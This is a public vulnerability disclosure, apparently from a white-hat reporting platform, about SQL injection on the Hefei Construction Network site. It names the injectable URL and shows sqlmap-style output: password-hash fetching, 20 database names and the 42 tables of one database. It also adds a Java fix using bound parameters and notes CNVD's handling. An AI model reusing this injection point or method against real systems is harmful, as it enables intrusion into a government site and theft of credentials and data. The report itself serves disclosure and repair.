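2014-06-10: Details reported to the vendor; awaiting vendor handling
2014-06-14: Vendor confirmed; details disclosed to the vendor only
2014-06-24: Details disclosed to core white hats and experts in related fields
2014-07-04: Details disclosed to regular white hats
2014-07-14: Details disclosed to trainee white hats
2014-07-25: Details disclosed to the public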
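Some pages of the Hefei Construction Network (合肥建设网) do not strictly filter the parameters they receive, which leads to SQL injection.
Injection point: http://www.hfjs.gov.cn/searchCenter/compBaseInfo.jsp?item_id=0701&comp_id=A08009101417613178
Database accounts: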
web application technology: JSP
back-end DBMS: Oracle
[15:30:34] [INFO] fetching database users password hashes
[15:30:34] [INFO] the SQL query used returns 90 entries
Databases:
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] JW
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SF_DB_CENTER
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Tables in database JW:
Database: JW
[42 tables]
+------------------------+
| JW_AUDIT_FLOW          |
| JW_AUDIT_PRIVILEGE     |
| JW_AUDIT_RESULT        |
| JW_BASE_ARTICLE        |
| JW_BASE_ARTICLEBAK     |
| JW_BASE_DEPTINFO       |
| JW_BASE_LINK           |
| JW_BASE_LIST           |
| JW_BASE_NOTICE         |
| JW_BASE_PORALCOUNT     |
| JW_BASE_SUBTITLE       |
| JW_BASE_USERINFO       |
| JW_BASE_WEBITEM        |
| JW_BASE_WEBITEMARTICLE |
| JW_EXPEINTER_BODY      |
| JW_EXPEINTER_HEAD      |
| JW_HDCENTER_MANAGER    |
| JW_HD_ITEM             |
| JW_LIST_ARTICLE        |
| JW_MAGAZINE_BODY       |
| JW_MAGAZINE_HEAD       |
| JW_MAGAZINE_ITEM       |
| JW_MESSAGE_DELETE      |
| JW_MESSAGE_FILE        |
| JW_NOTICE_AUDIT        |
| JW_NOTICE_AUDIT_RESULT |
| JW_NOTICE_VIEW         |
| JW_ONLINE_CONTRIBUTE   |
| JW_ONLINE_MESSAGE      |
| JW_ONLINE_REFER        |
| JW_PRIVILEGE_ITEM      |
| JW_PRIVILEGE_ROLES     |
| JW_RELEASE_ANNEX       |
| JW_RELEASE_REVIEW      |
| JW_SETTYPE_BODY        |
| JW_SETTYPE_HEAD        |
| JW_SURVEY_BODY         |
| JW_SURVEY_HEAD         |
| JW_TEMPLET_APPLY       |
| JW_TEMPLET_INFO        |
| JW_TEMPLET_TYPE        |
| JW_TEMP_GCJSGL         |
+------------------------+
Filter, filter!
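The report asks for input filtering. The following is an added example, not code from the site or the report, showing the usual form of that fix for a JSP/JDBC page backed by Oracle: strict allow-list validation of `item_id` and `comp_id` plus bound parameters instead of string concatenation. The class name, the table and column names, and the accepted formats are assumptions inferred only from the sample URL.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

public final class CompBaseInfoDao {
    // Assumed formats, inferred only from the URL values 0701 and A08009101417613178.
    private static final Pattern ITEM_ID = Pattern.compile("\\d{1,8}");
    private static final Pattern COMP_ID = Pattern.compile("[A-Za-z0-9]{1,32}");

    // Hypothetical table and column names; the report does not show the real query.
    // The injectable form would build this string by concatenating comp_id into it.
    private static final String QUERY =
        "SELECT comp_name FROM comp_base_info WHERE item_id = ? AND comp_id = ?";

    /** Rejects any value that is not a plain identifier before it reaches the database. */
    static String requireMatch(Pattern allowed, String value, String name) {
        if (value == null || !allowed.matcher(value).matches()) {
            throw new IllegalArgumentException("invalid parameter: " + name);
        }
        return value;
    }

    /** Looks up one row with both values bound as data, never spliced into the SQL text. */
    public static String findCompanyName(Connection conn, String itemId, String compId)
            throws SQLException {
        String item = requireMatch(ITEM_ID, itemId, "item_id");
        String comp = requireMatch(COMP_ID, compId, "comp_id");
        try (PreparedStatement ps = conn.prepareStatement(QUERY)) {
            ps.setString(1, item);
            ps.setString(2, comp);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: the id from the URL, and the same id with a stray quote.
        for (String s : new String[] { "A08009101417613178", "A08009101417613178'" }) {
            try {
                requireMatch(COMP_ID, s, "comp_id");
                System.out.println("accepted: " + s);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + s);
            }
        }
    }
}
```

Binding the parameters closes the injection itself. The account listing in the report also shows that the application's database account could read the password-hash views, so that account's privileges should be reduced to what the site actually needs.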
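Severity: High
Vulnerability Rank: 11
Confirmed at: 2014-06-14 22:54
CNVD confirmed and reproduced the situation described; it has been passed to CNCERT, which forwarded it to the Anhui branch center for handling, and that center will follow up with the organization that administers the website.
None yet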